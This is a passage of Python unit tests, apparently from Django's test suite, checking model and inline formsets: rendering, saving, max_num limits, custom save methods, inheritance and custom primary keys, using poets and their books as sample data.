AuthorFormSet = modelformset_factory(Author, extra=1, can_delete=True)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 4)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-name">Name:</label> <input id="id_form-0-name" type="text" name="form-0-name" value="Arthur Rimbaud" maxlength="100" /></p>\n'
'<p><label for="id_form-0-DELETE">Delete:</label> <input type="checkbox" name="form-0-DELETE" id="id_form-0-DELETE" /><input type="hidden" name="form-0-id" value="%d" id="id_form-0-id" /></p>' % author2.id)
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_form-1-name">Name:</label> <input id="id_form-1-name" type="text" name="form-1-name" value="Charles Baudelaire" maxlength="100" /></p>\n'
'<p><label for="id_form-1-DELETE">Delete:</label> <input type="checkbox" name="form-1-DELETE" id="id_form-1-DELETE" /><input type="hidden" name="form-1-id" value="%d" id="id_form-1-id" /></p>' % author1.id)
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_form-2-name">Name:</label> <input id="id_form-2-name" type="text" name="form-2-name" value="Paul Verlaine" maxlength="100" /></p>\n'
'<p><label for="id_form-2-DELETE">Delete:</label> <input type="checkbox" name="form-2-DELETE" id="id_form-2-DELETE" /><input type="hidden" name="form-2-id" value="%d" id="id_form-2-id" /></p>' % author3.id)
self.assertHTMLEqual(formset.forms[3].as_p(),
'<p><label for="id_form-3-name">Name:</label> <input id="id_form-3-name" type="text" name="form-3-name" maxlength="100" /></p>\n'
'<p><label for="id_form-3-DELETE">Delete:</label> <input type="checkbox" name="form-3-DELETE" id="id_form-3-DELETE" /><input type="hidden" name="form-3-id" id="id_form-3-id" /></p>')
data = {
'form-TOTAL_FORMS': '4', # the number of forms rendered
'form-INITIAL_FORMS': '3', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-id': str(author2.id),
'form-0-name': 'Arthur Rimbaud',
'form-1-id': str(author1.id),
'form-1-name': 'Charles Baudelaire',
'form-2-id': str(author3.id),
'form-2-name': 'Paul Verlaine',
'form-3-name': 'Walt Whitman',
'form-3-DELETE': 'on',
}
formset = AuthorFormSet(data=data, queryset=qs)
self.assertTrue(formset.is_valid())
# No objects were changed or saved so nothing will come back.
self.assertEqual(formset.save(), [])
authors = list(Author.objects.order_by('name'))
self.assertEqual(authors, [author2, author1, author3])
# Let's edit a record to ensure save only returns that one record.
data = {
'form-TOTAL_FORMS': '4', # the number of forms rendered
'form-INITIAL_FORMS': '3', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-id': str(author2.id),
'form-0-name': 'Walt Whitman',
'form-1-id': str(author1.id),
'form-1-name': 'Charles Baudelaire',
'form-2-id': str(author3.id),
'form-2-name': 'Paul Verlaine',
'form-3-name': '',
'form-3-DELETE': '',
}
formset = AuthorFormSet(data=data, queryset=qs)
self.assertTrue(formset.is_valid())
# One record has changed.
saved = formset.save()
self.assertEqual(len(saved), 1)
self.assertEqual(saved[0], Author.objects.get(name='Walt Whitman'))
def test_commit_false(self):
# Test the behavior of commit=False and save_m2m
author1 = Author.objects.create(name='Charles Baudelaire')
author2 = Author.objects.create(name='Paul Verlaine')
author3 = Author.objects.create(name='Walt Whitman')
meeting = AuthorMeeting.objects.create(created=date.today())
meeting.authors = Author.objects.all()
# create an Author instance to add to the meeting.
author4 = Author.objects.create(name='John Steinbeck')
AuthorMeetingFormSet = modelformset_factory(AuthorMeeting, extra=1, can_delete=True)
data = {
'form-TOTAL_FORMS': '2', # the number of forms rendered
'form-INITIAL_FORMS': '1', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-id': str(meeting.id),
'form-0-name': '2nd Tuesday of the Week Meeting',
'form-0-authors': [author2.id, author1.id, author3.id, author4.id],
'form-1-name': '',
'form-1-authors': '',
'form-1-DELETE': '',
}
formset = AuthorMeetingFormSet(data=data, queryset=AuthorMeeting.objects.all())
self.assertTrue(formset.is_valid())
instances = formset.save(commit=False)
for instance in instances:
instance.created = date.today()
instance.save()
formset.save_m2m()
self.assertQuerysetEqual(instances[0].authors.all(), [
'<Author: Charles Baudelaire>',
'<Author: John Steinbeck>',
'<Author: Paul Verlaine>',
'<Author: Walt Whitman>',
])
def test_max_num(self):
# Test the behavior of max_num with model formsets. It should allow
# all existing related objects/inlines for a given object to be
# displayed, but not allow the creation of new inlines beyond max_num.
author1 = Author.objects.create(name='Charles Baudelaire')
author2 = Author.objects.create(name='Paul Verlaine')
author3 = Author.objects.create(name='Walt Whitman')
qs = Author.objects.order_by('name')
AuthorFormSet = modelformset_factory(Author, max_num=None, extra=3)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 6)
self.assertEqual(len(formset.extra_forms), 3)
AuthorFormSet = modelformset_factory(Author, max_num=4, extra=3)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 4)
self.assertEqual(len(formset.extra_forms), 1)
AuthorFormSet = modelformset_factory(Author, max_num=0, extra=3)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 3)
self.assertEqual(len(formset.extra_forms), 0)
AuthorFormSet = modelformset_factory(Author, max_num=None)
formset = AuthorFormSet(queryset=qs)
self.assertQuerysetEqual(formset.get_queryset(), [
'<Author: Charles Baudelaire>',
'<Author: Paul Verlaine>',
'<Author: Walt Whitman>',
])
AuthorFormSet = modelformset_factory(Author, max_num=0)
formset = AuthorFormSet(queryset=qs)
self.assertQuerysetEqual(formset.get_queryset(), [
'<Author: Charles Baudelaire>',
'<Author: Paul Verlaine>',
'<Author: Walt Whitman>',
])
AuthorFormSet = modelformset_factory(Author, max_num=4)
formset = AuthorFormSet(queryset=qs)
self.assertQuerysetEqual(formset.get_queryset(), [
'<Author: Charles Baudelaire>',
'<Author: Paul Verlaine>',
'<Author: Walt Whitman>',
])
def test_custom_save_method(self):
class PoetForm(forms.ModelForm):
def save(self, commit=True):
# change the name to "Vladimir Mayakovsky" just to be a jerk.
author = super(PoetForm, self).save(commit=False)
author.name = "Vladimir Mayakovsky"
if commit:
author.save()
return author
PoetFormSet = modelformset_factory(Poet, form=PoetForm)
data = {
'form-TOTAL_FORMS': '3', # the number of forms rendered
'form-INITIAL_FORMS': '0', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-name': 'Walt Whitman',
'form-1-name': 'Charles Baudelaire',
'form-2-name': '',
}
qs = Poet.objects.all()
formset = PoetFormSet(data=data, queryset=qs)
self.assertTrue(formset.is_valid())
poets = formset.save()
self.assertEqual(len(poets), 2)
poet1, poet2 = poets
self.assertEqual(poet1.name, 'Vladimir Mayakovsky')
self.assertEqual(poet2.name, 'Vladimir Mayakovsky')
def test_custom_form(self):
""" Test that model_formset respects fields and exclude parameters of
        a custom form
"""
class PostForm1(forms.ModelForm):
class Meta:
model = Post
fields = ('title', 'posted')
class PostForm2(forms.ModelForm):
class Meta:
model = Post
exclude = ('subtitle',)
PostFormSet = modelformset_factory(Post, form=PostForm1)
formset = PostFormSet()
self.assertFalse("subtitle" in formset.forms[0].fields)
PostFormSet = modelformset_factory(Post, form=PostForm2)
formset = PostFormSet()
self.assertFalse("subtitle" in formset.forms[0].fields)
def test_model_inheritance(self):
BetterAuthorFormSet = modelformset_factory(BetterAuthor)
formset = BetterAuthorFormSet()
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-name">Name:</label> <input id="id_form-0-name" type="text" name="form-0-name" maxlength="100" /></p>\n'
'<p><label for="id_form-0-write_speed">Write speed:</label> <input type="text" name="form-0-write_speed" id="id_form-0-write_speed" /><input type="hidden" name="form-0-author_ptr" id="id_form-0-author_ptr" /></p>')
data = {
'form-TOTAL_FORMS': '1', # the number of forms rendered
'form-INITIAL_FORMS': '0', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-author_ptr': '',
'form-0-name': 'Ernest Hemingway',
'form-0-write_speed': '10',
}
formset = BetterAuthorFormSet(data)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
author1, = saved
self.assertEqual(author1, BetterAuthor.objects.get(name='Ernest Hemingway'))
hemingway_id = BetterAuthor.objects.get(name="Ernest Hemingway").pk
formset = BetterAuthorFormSet()
self.assertEqual(len(formset.forms), 2)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-name">Name:</label> <input id="id_form-0-name" type="text" name="form-0-name" value="Ernest Hemingway" maxlength="100" /></p>\n'
'<p><label for="id_form-0-write_speed">Write speed:</label> <input type="text" name="form-0-write_speed" value="10" id="id_form-0-write_speed" /><input type="hidden" name="form-0-author_ptr" value="%d" id="id_form-0-author_ptr" /></p>' % hemingway_id)
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_form-1-name">Name:</label> <input id="id_form-1-name" type="text" name="form-1-name" maxlength="100" /></p>\n'
'<p><label for="id_form-1-write_speed">Write speed:</label> <input type="text" name="form-1-write_speed" id="id_form-1-write_speed" /><input type="hidden" name="form-1-author_ptr" id="id_form-1-author_ptr" /></p>')
data = {
'form-TOTAL_FORMS': '2', # the number of forms rendered
'form-INITIAL_FORMS': '1', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-author_ptr': hemingway_id,
'form-0-name': 'Ernest Hemingway',
'form-0-write_speed': '10',
'form-1-author_ptr': '',
'form-1-name': '',
'form-1-write_speed': '',
}
formset = BetterAuthorFormSet(data)
self.assertTrue(formset.is_valid())
self.assertEqual(formset.save(), [])
def test_inline_formsets(self):
# We can also create a formset that is tied to a parent model. This is
# how the admin system's edit inline functionality works.
AuthorBooksFormSet = inlineformset_factory(Author, Book, can_delete=False, extra=3)
author = Author.objects.create(name='Charles Baudelaire')
formset = AuthorBooksFormSet(instance=author)
self.assertEqual(len(formset.forms), 3)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_book_set-0-title">Title:</label> <input id="id_book_set-0-title" type="text" name="book_set-0-title" maxlength="100" /><input type="hidden" name="book_set-0-author" value="%d" id="id_book_set-0-author" /><input type="hidden" name="book_set-0-id" id="id_book_set-0-id" /></p>' % author.id)
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_book_set-1-title">Title:</label> <input id="id_book_set-1-title" type="text" name="book_set-1-title" maxlength="100" /><input type="hidden" name="book_set-1-author" value="%d" id="id_book_set-1-author" /><input type="hidden" name="book_set-1-id" id="id_book_set-1-id" /></p>' % author.id)
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_book_set-2-title">Title:</label> <input id="id_book_set-2-title" type="text" name="book_set-2-title" maxlength="100" /><input type="hidden" name="book_set-2-author" value="%d" id="id_book_set-2-author" /><input type="hidden" name="book_set-2-id" id="id_book_set-2-id" /></p>' % author.id)
data = {
'book_set-TOTAL_FORMS': '3', # the number of forms rendered
'book_set-INITIAL_FORMS': '0', # the number of forms with initial data
'book_set-MAX_NUM_FORMS': '', # the max number of forms
'book_set-0-title': 'Les Fleurs du Mal',
'book_set-1-title': '',
'book_set-2-title': '',
}
formset = AuthorBooksFormSet(data, instance=author)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
book1, = saved
self.assertEqual(book1, Book.objects.get(title='Les Fleurs du Mal'))
self.assertQuerysetEqual(author.book_set.all(), ['<Book: Les Fleurs du Mal>'])
# Now that we've added a book to Charles Baudelaire, let's try adding
# another one. This time though, an edit form will be available for
# every existing book.
AuthorBooksFormSet = inlineformset_factory(Author, Book, can_delete=False, extra=2)
author = Author.objects.get(name='Charles Baudelaire')
formset = AuthorBooksFormSet(instance=author)
self.assertEqual(len(formset.forms), 3)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_book_set-0-title">Title:</label> <input id="id_book_set-0-title" type="text" name="book_set-0-title" value="Les Fleurs du Mal" maxlength="100" /><input type="hidden" name="book_set-0-author" value="%d" id="id_book_set-0-author" /><input type="hidden" name="book_set-0-id" value="%d" id="id_book_set-0-id" /></p>' % (author.id, book1.id))
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_book_set-1-title">Title:</label> <input id="id_book_set-1-title" type="text" name="book_set-1-title" maxlength="100" /><input type="hidden" name="book_set-1-author" value="%d" id="id_book_set-1-author" /><input type="hidden" name="book_set-1-id" id="id_book_set-1-id" /></p>' % author.id)
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_book_set-2-title">Title:</label> <input id="id_book_set-2-title" type="text" name="book_set-2-title" maxlength="100" /><input type="hidden" name="book_set-2-author" value="%d" id="id_book_set-2-author" /><input type="hidden" name="book_set-2-id" id="id_book_set-2-id" /></p>' % author.id)
data = {
'book_set-TOTAL_FORMS': '3', # the number of forms rendered
'book_set-INITIAL_FORMS': '1', # the number of forms with initial data
'book_set-MAX_NUM_FORMS': '', # the max number of forms
'book_set-0-id': str(book1.id),
'book_set-0-title': 'Les Fleurs du Mal',
'book_set-1-title': 'Les Paradis Artificiels',
'book_set-2-title': '',
}
formset = AuthorBooksFormSet(data, instance=author)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
book2, = saved
self.assertEqual(book2, Book.objects.get(title='Les Paradis Artificiels'))
# As you can see, 'Les Paradis Artificiels' is now a book belonging to
# Charles Baudelaire.
self.assertQuerysetEqual(author.book_set.order_by('title'), [
'<Book: Les Fleurs du Mal>',
'<Book: Les Paradis Artificiels>',
])
def test_inline_formsets_save_as_new(self):
# The save_as_new parameter lets you re-associate the data to a new
# instance. This is used in the admin for save_as functionality.
AuthorBooksFormSet = inlineformset_factory(Author, Book, can_delete=False, extra=2)
author = Author.objects.create(name='Charles Baudelaire')
data = {
'book_set-TOTAL_FORMS': '3', # the number of forms rendered
'book_set-INITIAL_FORMS': '2', # the number of forms with initial data
'book_set-MAX_NUM_FORMS': '', # the max number of forms
'book_set-0-id': '1',
'book_set-0-title': 'Les Fleurs du Mal',
'book_set-1-id': '2',
'book_set-1-title': 'Les Paradis Artificiels',
'book_set-2-title': '',
}
formset = AuthorBooksFormSet(data, instance=Author(), save_as_new=True)
self.assertTrue(formset.is_valid())
new_author = Author.objects.create(name='Charles Baudelaire')
formset = AuthorBooksFormSet(data, instance=new_author, save_as_new=True)
saved = formset.save()
self.assertEqual(len(saved), 2)
book1, book2 = saved
self.assertEqual(book1.title, 'Les Fleurs du Mal')
self.assertEqual(book2.title, 'Les Paradis Artificiels')
# Test using a custom prefix on an inline formset.
formset = AuthorBooksFormSet(prefix="test")
self.assertEqual(len(formset.forms), 2)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_test-0-title">Title:</label> <input id="id_test-0-title" type="text" name="test-0-title" maxlength="100" /><input type="hidden" name="test-0-author" id="id_test-0-author" /><input type="hidden" name="test-0-id" id="id_test-0-id" /></p>')
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_test-1-title">Title:</label> <input id="id_test-1-title" type="text" name="test-1-title" maxlength="100" /><input type="hidden" name="test-1-author" id="id_test-1-author" /><input type="hidden" name="test-1-id" id="id_test-1-id" /></p>')
def test_inline_formsets_with_custom_pk(self):
# Test inline formsets where the inline-edited object has a custom
# primary key that is not the fk to the parent object.
AuthorBooksFormSet2 = inlineformset_factory(Author, BookWithCustomPK, can_delete=False, extra=1)
author = Author.objects.create(pk=1, name='Charles Baudelaire')
formset = AuthorBooksFormSet2(instance=author)
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_bookwithcustompk_set-0-my_pk">My pk:</label> <input type="text" name="bookwithcustompk_set-0-my_pk" id="id_bookwithcustompk_set-0-my_pk" /></p>\n'
'<p><label for="id_bookwithcustompk_set-0-title">Title:</label> <input id="id_bookwithcustompk_set-0-title" type="text" name="bookwithcustompk_set-0-title" maxlength="100" /><input type="hidden" name="bookwithcustompk_set-0-author" value="1" id="id_bookwithcustompk_set-0-author" /></p>')
data = {
'bookwithcustompk_set-TOTAL_FORMS': '1', # the number of forms rendered
'bookwithcustompk_set-INITIAL_FORMS': '0', # the number of forms with initial data
'bookwithcustompk_set-MAX_NUM_FORMS': '', # the max number of forms
'bookwithcustompk_set-0-my_pk': '77777',
'bookwithcustompk_set-0-title': 'Les Fleurs du Mal',
}
formset = AuthorBooksFormSet2(data, instance=author)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
book1, = saved
self.assertEqual(book1.pk, 77777)
book1 = author.bookwithcustompk_set.get()
self.assertEqual(book1.title, 'Les Fleurs du Mal')
def test_inline_formsets_with_multi_table_inheritance(self):
# Test inline formsets where the inline-edited object uses multi-table
# inheritance, thus has a non AutoField yet auto-created primary key.
AuthorBooksFormSet3 = inlineformset_factory(Author, AlternateBook, can_delete=False, extra=1)
author = Author.objects.create(pk=1, name='Charles Baudelaire')
formset = AuthorBooksFormSet3(instance=author)
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_alternatebook_set-0-title">Title:</label> <input id="id_alternatebook_set-0-title" type="text" name="alternatebook_set-0-title" maxlength="100" /></p>\n'
'<p><label for="id_alternatebook_set-0-notes">Notes:</label> <input id="id_alternatebook_set-0-notes" type="text" name="alternatebook_set-0-notes" maxlength="100" /><input type="hidden" name="alternatebook_set-0-author" value="1" id="id_alternatebook_set-0-author" /><input type="hidden" name="alternatebook_set-0-book_ptr" id="id_alternatebook_set-0-book_ptr" /></p>')
data = {
'alternatebook_set-TOTAL_FORMS': '1', # the number of forms rendered
'alternatebook_set-INITIAL_FORMS': '0', # the number of forms with initial data
'alternatebook_set-MAX_NUM_FORMS': '', # the max number of forms
'alternatebook_set-0-title': 'Flowers of Evil',
'alternatebook_set-0-notes': 'English translation of Les Fleurs du Mal'
}
formset = AuthorBooksFormSet3(data, instance=author)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
book1, = saved
self.assertEqual(book1.title, 'Flowers of Evil')
self.assertEqual(book1.notes, 'English translation of Les Fleurs du Mal')
@skipUnlessDBFeature('ignores_nulls_in_unique_constraints')
def test_inline_formsets_with_nullable_unique_together(self):
# Test inline formsets where the inline-edited object has a
# unique_together constraint with a nullable member
AuthorBooksFormSet4 = inlineformset_factory(Author, BookWithOptionalAltEditor, can_delete=False, extra=2)
author = Author.objects.create(pk=1, name='Charles Baudelaire')
data = {
'bookwithoptionalalteditor_set-TOTAL_FORMS': '2', # the number of forms rendered
'bookwithoptionalalteditor_set-INITIAL_FORMS': '0', # the number of forms with initial data
'bookwithoptionalalteditor_set-MAX_NUM_FORMS': '', # the max number of forms
'bookwithoptionalalteditor_set-0-author': '1',
'bookwithoptionalalteditor_set-0-title': 'Les Fleurs du Mal',
'bookwithoptionalalteditor_set-1-author': '1',
'bookwithoptionalalteditor_set-1-title': 'Les Fleurs du Mal',
}
formset = AuthorBooksFormSet4(data, instance=author)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 2)
book1, book2 = saved
self.assertEqual(book1.author_id, 1)
self.assertEqual(book1.title, 'Les Fleurs du Mal')
self.assertEqual(book2.author_id, 1)
self.assertEqual(book2.title, 'Les Fleurs du Mal')
def test_inline_formsets_with_custom_save_method(self):
AuthorBooksFormSet = inlineformset_factory(Author, Book, can_delete=False, extra=2)
author = Author.objects.create(pk=1, name='Charles Baudelaire')
book1 = Book.objects.create(pk=1, author=author, title='Les Paradis Artificiels')
book2 = Book.objects.create(pk=2, author=author, title='Les Fleurs du Mal')
book3 = Book.objects.create(pk=3, author=author, title='Flowers of Evil')
class PoemForm(forms.ModelForm):
def save(self, commit=True):
# change the name to "Brooklyn Bridge" just to be a jerk.
poem = super(PoemForm, self).save(commit=False)
poem.name = "Brooklyn Bridge"
if commit:
poem.save()
return poem
PoemFormSet = inlineformset_factory(Poet, Poem, form=PoemForm)
data = {
'poem_set-TOTAL_FORMS': '3', # the number of forms rendered
'poem_set-INITIAL_FORMS': '0', # the number of forms with initial data
'poem_set-MAX_NUM_FORMS': '', # the max number of forms
'poem_set-0-name': 'The Cloud in Trousers',
'poem_set-1-name': 'I',
'poem_set-2-name': '',
}
poet = Poet.objects.create(name='Vladimir Mayakovsky')
formset = PoemFormSet(data=data, instance=poet)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 2)
poem1, poem2 = saved
self.assertEqual(poem1.name, 'Brooklyn Bridge')
self.assertEqual(poem2.name, 'Brooklyn Bridge')
# We can provide a custom queryset to our InlineFormSet:
custom_qs = Book.objects.order_by('-title')
formset = AuthorBooksFormSet(instance=author, queryset=custom_qs)
self.assertEqual(len(formset.forms), 5)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_book_set-0-title">Title:</label> <input id="id_book_set-0-title" type="text" name="book_set-0-title" value="Les Paradis Artificiels" maxlength="100" /><input type="hidden" name="book_set-0-author" value="1" id="id_book_set-0-author" /><input type="hidden" name="book_set-0-id" value="1" id="id_book_set-0-id" /></p>')
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_book_set-1-title">Title:</label> <input id="id_book_set-1-title" type="text" name="book_set-1-title" value="Les Fleurs du Mal" maxlength="100" /><input type="hidden" name="book_set-1-author" value="1" id="id_book_set-1-author" /><input type="hidden" name="book_set-1-id" value="2" id="id_book_set-1-id" /></p>')
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_book_set-2-title">Title:</label> <input id="id_book_set-2-title" type="text" name="book_set-2-title" value="Flowers of Evil" maxlength="100" /><input type="hidden" name="book_set-2-author" value="1" id="id_book_set-2-author" /><input type="hidden" name="book_set-2-id" value="3" id="id_book_set-2-id" /></p>')
self.assertHTMLEqual(formset.forms[3].as_p(),
'<p><label for="id_book_set-3-title">Title:</label> <input id="id_book_set-3-title" type="text" name="book_set-3-title" maxlength="100" /><input type="hidden" name="book_set-3-author" value="1" id="id_book_set-3-author" /><input type="hidden" name="book_set-3-id" id="id_book_set-3-id" /></p>')
self.assertHTMLEqual(formset.forms[4].as_p(),
'<p><label for="id_book_set-4-title">Title:</label> <input id="id_book_set-4-title" type="text" name="book_set-4-title" maxlength="100" /><input type="hidden" name="book_set-4-author" value="1" id="id_book_set-4-author" /><input type="hidden" name="book_set-4-id" id="id_book_set-4-id" /></p>')
data = {
'book_set-TOTAL_FORMS': '5', # the number of forms rendered
'book_set-INITIAL_FORMS': '3', # the number of forms with initial data
'book_set-MAX_NUM_FORMS': '', # the max number of forms
'book_set-0-id': str(book1.id),
'book_set-0-title': 'Les Paradis Artificiels',
'book_set-1-id': str(book2.id),
'book_set-1-title': 'Les Fleurs du Mal',
'book_set-2-id': str(book3.id),
'book_set-2-title': 'Flowers of Evil',
'book_set-3-title': 'Revue des deux mondes',
'book_set-4-title': '',
}
formset = AuthorBooksFormSet(data, instance=author, queryset=custom_qs)
self.assertTrue(formset.is_valid())
custom_qs = Book.objects.filter(title__startswith='F')
formset = AuthorBooksFormSet(instance=author, queryset=custom_qs)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_book_set-0-title">Title:</label> <input id="id_book_set-0-title" type="text" name="book_set-0-title" value="Flowers of Evil" maxlength="100" /><input type="hidden" name="book_set-0-author" value="1" id="id_book_set-0-author" /><input type="hidden" name="book_set-0-id" value="3" id="id_book_set-0-id" /></p>')
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_book_set-1-title">Title:</label> <input id="id_book_set-1-title" type="text" name="book_set-1-title" maxlength="100" /><input type="hidden" name="book_set-1-author" value="1" id="id_book_set-1-author" /><input type="hidden" name="book_set-1-id" id="id_book_set-1-id" /></p>')
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_book_set-2-title">Title:</label> <input id="id_book_set-2-title" type="text" name="book_set-2-title" maxlength="100" /><input type="hidden" name="book_set-2-author" value="1" id="id_book_set-2-author" /><input type="hidden" name="book_set-2-id" id="id_book_set-2-id" /></p>')
data = {
'book_set-TOTAL_FORMS': '3', # the number of forms rendered
'book_set-INITIAL_FORMS': '1', # the number of forms with initial data
'book_set-MAX_NUM_FORMS': '', # the max number of forms
'book_set-0-id': str(book3.id),
'book_set-0-title': 'Flowers of Evil',
'book_set-1-title': 'Revue des deux mondes',
'book_set-2-title': '',
}
formset = AuthorBooksFormSet(data, instance=author, queryset=custom_qs)
self.assertTrue(formset.is_valid())
def test_custom_pk(self):
        # We need to ensure that the custom primary key is displayed in the form.
CustomPrimaryKeyFormSet = modelformset_factory(CustomPrimaryKey)
formset = CustomPrimaryKeyFormSet()
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-my_pk">My pk:</label> <input id="id_form-0-my_pk" type="text" name="form-0-my_pk" maxlength="10" /></p>\n'
'<p><label for="id_form-0-some_field">Some field:</label> <input id="id_form-0-some_field" type="text" name="form-0-some_field" maxlength="100" /></p>')
# Custom primary keys with ForeignKey, OneToOneField and AutoField ############
place = Place.objects.create(pk=1, name='Giordanos', city='Chicago')
FormSet = inlineformset_factory(Place, Owner, extra=2, can_delete=False)
formset = FormSet(instance=place)
self.assertEqual(len(formset.forms), 2)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_owner_set-0-name">Name:</label> <input id="id_owner_set-0-name" type="text" name="owner_set-0-name" maxlength="100" /><input type="hidden" name="owner_set-0-place" value="1" id="id_owner_set-0-place" /><input type="hidden" name="owner_set-0-auto_id" id="id_owner_set-0-auto_id" /></p>')
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_owner_set-1-name">Name:</label> <input id="id_owner_set-1-name" type="text" name="owner_set-1-name" maxlength="100" /><input type="hidden" name="owner_set-1-place" value="1" id="id_owner_set-1-place" /><input type="hidden" name="owner_set-1-auto_id" id="id_owner_set-1-auto_id" /></p>')
data = {
'owner_set-TOTAL_FORMS': '2',
'owner_set-INITIAL_FORMS': '0',
'owner_set-MAX_NUM_FORMS': '',
'owner_set-0-auto_id': '',
'owner_set-0-name': 'Joe Perry',
'owner_set-1-auto_id': '',
'owner_set-1-name': '',
}
formset = FormSet(data, instance=place)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
owner1, = saved
self.assertEqual(owner1.name, 'Joe Perry')
self.assertEqual(owner1.place.name, 'Giordanos')
formset = FormSet(instance=place)
self.assertEqual(len(formset.forms), 3)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_owner_set-0-name">Name:</label> <input id="id_owner_set-0-name" type="text" name="owner_set-0-name" value="Joe Perry" maxlength="100" /><input type="hidden" name="owner_set-0-place" value="1" id="id_owner_set-0-place" /><input type="hidden" name="owner_set-0-auto_id" value="%d" id="id_owner_set-0-auto_id" /></p>'
% owner1.auto_id)
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_owner_set-1-name">Name:</label> <input id="id_owner_set-1-name" type="text" name="owner_set-1-name" maxlength="100" /><input type="hidden" name="owner_set-1-place" value="1" id="id_owner_set-1-place" /><input type="hidden" name="owner_set-1-auto_id" id="id_owner_set-1-auto_id" /></p>')
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_owner_set-2-name">Name:</label> <input id="id_owner_set-2-name" type="text" name="owner_set-2-name" maxlength="100" /><input type="hidden" name="owner_set-2-place" value="1" id="id_owner_set-2-place" /><input type="hidden" name="owner_set-2-auto_id" id="id_owner_set-2-auto_id" /></p>')
data = {
'owner_set-TOTAL_FORMS': '3',
'owner_set-INITIAL_FORMS': '1',
'owner_set-MAX_NUM_FORMS': '',
'owner_set-0-auto_id': six.text_type(owner1.auto_id),
'owner_set-0-name': 'Joe Perry',
'owner_set-1-auto_id': '',
'owner_set-1-name': 'Jack Berry',
'owner_set-2-auto_id': '',
'owner_set-2-name': '',
}
formset = FormSet(data, instance=place)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
owner2, = saved
self.assertEqual(owner2.name, 'Jack Berry')
self.assertEqual(owner2.place.name, 'Giordanos')
        # Ensure a custom primary key that is a ForeignKey or OneToOneField gets rendered for the user to choose.
FormSet = modelformset_factory(OwnerProfile)
formset = FormSet()
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-owner">Owner:</label> <select name="form-0-owner" id="id_form-0-owner">\n'
'<option value="" selected="selected">---------</option>\n'
'<option value="%d">Joe Perry at Giordanos</option>\n'
'<option value="%d">Jack Berry at Giordanos</option>\n'
'</select></p>\n'
'<p><label for="id_form-0-age">Age:</label> <input type="text" name="form-0-age" id="id_form-0-age" /></p>'
% (owner1.auto_id, owner2.auto_id))
owner1 = Owner.objects.get(name='Joe Perry')
FormSet = inlineformset_factory(Owner, OwnerProfile, max_num=1, can_delete=False)
self.assertEqual(FormSet.max_num, 1)
formset = FormSet(instance=owner1)
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_ownerprofile-0-age">Age:</label> <input type="text" name="ownerprofile-0-age" id="id_ownerprofile-0-age" /><input type="hidden" name="ownerprofile-0-owner" value="%d" id="id_ownerprofile-0-owner" /></p>'
% owner1.auto_id)
data = {
'ownerprofile-TOTAL_FORMS': '1',
'ownerprofile-INITIAL_FORMS': '0',
'ownerprofile-MAX_NUM_FORMS': '1',
'ownerprofile-0-owner': '',
'ownerprofile-0-age': '54',
}
formset = FormSet(data, instance=owner1)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
profile1, = saved
self.assertEqual(profile1.owner, owner1)
